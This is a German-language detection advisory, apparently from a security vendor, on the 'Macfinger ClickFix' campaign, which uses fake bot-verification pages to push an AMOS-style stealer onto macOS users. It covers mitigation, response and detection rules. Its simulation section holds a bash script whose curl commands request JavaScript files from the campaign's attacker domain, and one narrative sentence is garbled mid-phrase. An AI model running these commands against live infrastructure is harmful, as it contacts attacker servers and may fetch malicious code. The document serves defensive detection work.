Macfinger ClickFix-Kampagne
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine neue Social-Engineering-Kampagne, die als Macfinger ClickFix verfolgt wird, zielt auf macOS-Nutzer, indem sie bösartige Skripte in legitime Webseiten injiziert. Der Angriff präsentiert gefälschte Bot-Schutzseiten, die Opfer dazu bringen, Befehle auszuführen, die macOS-spezifische Malware herunterladen. Die Nutzlast scheint eine Variante des Atomic macOS Stealer (AMOS) zu sein, die entwickelt wurde, um Anmeldeinformationen und andere Benutzerinformationen zu stehlen.
Untersuchung
Die Untersuchung identifizierte legitime Webseiten, die mit injizierten Skripten kompromittiert wurden, die gefälschte Verifizierungspopups anzeigen. Eine Analyse des Netzwerkverkehrs enthüllte eine dedizierte Domain zur Benutzerverfolgung sowie mehrere IP-Adressen, die die Malware-Auslieferung und Command-and-Control (C2)-Kommunikation unterstützen. Beobachtete Verkehrsströme weisen auf die Exfiltration von Anmelde- und Systeminformationen über HTTP POST-Anfragen hin.
Minderung
Benutzer sollten geschult werden, den Anweisungen unerwarteter Browser-Popups oder gefälschter Bot-Verifizierungsseiten nicht zu folgen. Organisationen sollten Webfiltering einsetzen, um bekannte bösartige Domains und IP-Adressen, die mit ClickFix-Kampagnen verbunden sind, zu blockieren. Es wird auch empfohlen, ungewöhnliche ausgehende Verbindungen zu nicht vertrauenswürdigen IP-Adressen über nicht standardmäßige Ports zu überwachen.
Reaktion
Wird Macfinger ClickFix-Aktivität entdeckt, sollten betroffene macOS-Hosts sofort isoliert werden, um weiteren Datenverlust zu stoppen. Einsatzkräfte sollten eine vollständige forensische Untersuchung durchführen, um das Ausmaß des Anmeldeinformationen-Kompromisses zu bestimmen. Potenziell ausgesetzte Anmeldeinformationen sollten zurückgesetzt und Systeme auf Persistenzmechanismen wie unautorisierte Shell-Skripte oder Mach-O-Binaries überprüft werden.
Angriffsfluss
Wir aktualisieren diesen Teil noch.
Erkennungen
Möglicher IP-Adressbezug Domänenkommunikationsversuch (via dns)
Verdächtige Command-and-Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)
Möglicher System_profiler-Enumerationsversuch (via process_creation)
Mögliche Base64-codierte Zeichenfolgenmanipulation [MacOS] (via cmdline)
Verdächtiger Curl-Ausführungsversuch [MacOS] (via cmdline)
IOCs (HashSha256) zur Erkennung: Macfinger ClickFix-Kampagne
IOCs (SourceIP) zur Erkennung: Macfinger ClickFix-Kampagne
IOCs (DestinationIP) zur Erkennung: Macfinger ClickFix-Kampagne
Erkennen des Macfinger ClickFix-Kampagnenverkehrs [Firewall]
Erkennen der Macfinger ClickFix-Skriptinjektion [Webserver]
Simulationsausführung
-
Angriffserzählung & Befehle: Ein Angreifer verwendet eine Social-Engineering-Technik bekannt als „ClickFix“, bei der ein Benutzer aufgefordert wird, auf einen Knopf zu klicken (oft ein gefälschtes „Fix“ oder „Update“), der ein bösartiges Skript ausführt. In dieser Simulation ahmen wir die Endstufe nach: der clientseitige Browser/Agent, der eine Anfrage an die von Macfinger kontrollierte Domain stellt
um eine bösartigeto fetch a malicious.jsDatei abzurufen. Diese Anfrage ist so gestaltet, dass sie eines der drei spezifischen Auswahlkriterien in der Erkennungslogik erfüllt. -
Regressionstestskript:
#!/bin/bash # Simulationsskript zur Auslösung der Macfinger ClickFix-Erkennungsregel echo "[*] Start der Macfinger ClickFix-Simulation..." # Ziel 1: Auswahl1 (Site-Parameter) echo "[*] Simuliere Anfrage an Auswahl1..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload" # Ziel 2: Auswahl2 (spezifische Hash-Datei) echo "[*] Simuliere Anfrage an Auswahl2..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js" # Ziel 3: Auswahl3 (ext-b Datei) echo "[*] Simuliere Anfrage an Auswahl3..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js" echo "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Alarme." -
Bereinigungskommandos:
# Keine lokale Bereinigung erforderlich, da es sich um ausgehende Netzwerk-Aktionen handelt. # Falls lokale Dateien erstellt wurden, entfernen Sie diese: rm -f /tmp/macfinger_test_*